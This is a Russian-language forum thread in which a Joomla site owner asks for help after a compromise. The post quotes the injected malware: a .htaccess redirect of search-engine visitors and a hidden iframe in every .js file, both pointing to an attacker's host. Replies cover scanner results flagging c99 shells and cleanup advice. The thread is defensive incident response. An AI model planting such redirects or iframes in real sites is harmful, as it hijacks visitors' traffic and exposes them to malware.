В 700 файлах появилась странная ссылка и другая хрень -> - Безопасность сайтов на Joomla

Например, в .htaccess вот это появилось

^.*(duckduckgo|ask|google|dogpile|archive|clusty|mahalo|mywebsearch|blekko|lycos|webcrawler|info|infospace|search|excite|goodsearch|altavista|live|msn|aol|yahoo|youtube|wikipedia|infoseek|bing|facebook|twitter|myspace|linkedin|flickr|deviantart|livejournal|tagged|badoo|mylife|ning|pinterest)\.(.*)                                                                                          
                                                                                          RewriteRule ^(.*)$ http://xmlbasedautomaticupdate.pingpong-shop.info/gjhk.cgi?7 [R=301,L]

Во всех .js файлах это

document.write('<iframe src="http://xmlbasedautomaticupdate.pingpong-shop.info/gjhk.cgi?7"
scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

Ссылка ведет на Google, вирусы на сайте не обнаружены...
Что это за хрень такая?

Ничего нового - у вас троян увел пароль от FTP... Как с этим бороться - читайте данный раздел, информации полно.

smart, а в чем смысл этого всего? Просто замедлить работу сайта?

Слить траффик. Сканерами из темы в подписи проверьте свой сайт, а комп AVPTool.

Слить траффик. Сканерами из темы в подписи проверьте свой сайт, а комп AVPTool.

Даа... совсем я не в теме... Всё вручную почистил, а можно было скриптом.

Сканеры:
ai-bolit.php выдает 502 Bad Gateway

fls.php выдает кучу строк вида:
File: /home/host1232457/*****/htdocs/www/templates/gk_corporate2/libs/gk.template.helper.php
String:: $_POST[

wishlight, что мне с этим делать?

AVPTool в процессе...
-----------
Ничего не нашел

есть что-то кроме get и post?

Да, еще есть такие:

File: /home/host1232457/***/htdocs/www/administrator/components/com_content/admin.content.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_jcomments/admin.jcomments.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/lib/class.upload.php
String:: phpinfo()

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/views/categories/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/views/comments/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/views/cpanel/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/views/item/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/views/users/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_phocadownload/views/phocadownloadusers/view.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_phocadownload/views/phocadownloadut/view.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_redj/views/errors/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_redj/views/referers/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_sh404sef/admin.sh404sef.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_swmenupro/admin.swmenupro.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_trash/admin.trash.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_akeeba/views/buadmin/view.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_hwdvideoshare/helpers/js.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/cache/mod_k2_content/1c9290c57d08b4fac3d3089b17b2f3e6.php
String:: c99

File: /home/host1232457/***/htdocs/www/cache/com_k2_extended/8f71b304f2f7eb6039db0c5539cd3959.php
String:: c99

File: /home/host1232457/***/htdocs/www/components/com_jcomments/tpl/default/tpl_comment.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/components/com_jcomments/tpl/gk_style/tpl_comment.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/components/com_k2/views/comments/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/components/com_k2/views/item/tmpl/form.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/components/com_hwdvideoshare/assets/uploads/perl/ubr_file_upload.php
String:: phpinfo()

File: /home/host1232457/***/htdocs/www/components/com_hwdvideoshare/views/upload_perl.php
String:: phpinfo()

File: /home/host1232457/***/htdocs/www/components/com_hwdvideoshare/controller.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/libraries/joomla/html/toolbar/button/confirm.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/media/mod_vinaora_cu3er/config/demo1.xml.php
String:: c99

File: /home/host1232457/***/htdocs/www/plugins/system/osolcaptcha.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/templates/gk_corporate2/layouts/blocks/iphone/mainnav.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/ai-bolit.php
String:: phpinfo()

Все файлы которые помечены как String:: c99 заражены - это шеллы удаляйте их.

Вот полный лог:

Все файлы которые помечены как String:: c99 заражены - это шеллы удаляйте их.

Вообще странно - я сравнил например этот файл /www/media/mod_vinaora_cu3er/config/demo1.xml.php с файлом из резервной копии незараженного сайта (перед выгрузкой на хостинг) - они идентичны.
----
p.s. остальные из папки кэша удалил.

Вообще странно - я сравнил например этот файл /www/media/mod_vinaora_cu3er/config/demo1.xml.php с файлом из резервной копии незараженного сайта (перед выгрузкой на хостинг) - они идентичны.
----
p.s. остальные из папки кэша удалил.

Я бы не был на вашем месте так уверен что другой сайт не заражен, может быть он ждет своего часа. Модуль брали из какого источника? Посмотрите может быть есть новая версия и стоит обновить до последней.

Брал из бэкапа этого-же сайта - он больше года работал без каких либо признаков заражения. Модуль брал с сайта разработчиков - думаю, еслиб проблема была в модуле, заражение появилось бы в течении года работы. Новых версий для J1.5 нет.

Брал из бэкапа этого-же сайта - он больше года работал без каких либо признаков заражения.

Это ничего не гарантирует. У меня шелл (судя по дате создания файла) пролежал несколько месяцев до того, как им начали пользоваться. Если Вы сами закинули себе шелл вместе с модулем, и он без "обратного звонка" хозяину (либо "звонки" уходили в никуда), шелл может найти бот, который тупо тычется в разные адреса в поисках известных дыр.

Вот содержимое этого файла (он небольшой) - что тут может указывать на шелл?
Из вики: "Шелл-код почти всегда содержит строку с именем оболочки" - что-нибудь в файле на это указывает?


Просто если сносить этот модуль, то хоть по делу, а не на всякий случай...

обратите внимание на

File: /home/host1232457/***/htdocs/www/sxd/index.php
String:: $_POST['pass']

что там в файле?

что там в файле?

Sypex Dumper

вы что скрип для дампа БД храните постоянно на хосте?
его как и все дополнительные скрипты заливают только для работы и потом сразу удаляют (к сканерам это тоже относиться)

вы что скрип для дампа БД храните постоянно на хосте?

Ээээ... Блин, да, хранил...
-------
Удалил всё...